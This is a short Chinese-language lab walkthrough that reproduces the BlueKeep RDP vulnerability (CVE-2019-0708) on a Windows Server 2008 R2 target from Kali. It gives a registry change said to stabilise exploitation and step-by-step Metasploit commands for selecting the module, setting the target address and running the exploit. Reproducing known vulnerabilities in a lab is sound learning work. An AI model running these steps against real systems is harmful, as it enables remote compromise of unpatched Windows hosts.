bluekeep 0708漏洞复现

影响系统：windows2003、windows2008、windows2008 R2、windows xp 、win7

Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广，漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的

环境：

攻击机kali2020

靶机Server2008 R2

 

攻击条件需要对方开启3389远程桌面

 

查看3389是否正常启动 netstat -an

 

修改注册表（win键+R 搜索regedit打开注册表）

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam]　　　复现这个漏洞必须注意：值修改为0才能稳定利用，不然极容易把受害机攻击到蓝屏

 

 

启动msfconsole

 

搜索漏洞模块

 

 

search 0708

 

use 3　　#使用第三个模块

set rhosts 192.168.3.138　　#设置目标地址

set target 2　　#set target （0-4) 设置受害机及其架构

exploit　　#运行

 

成功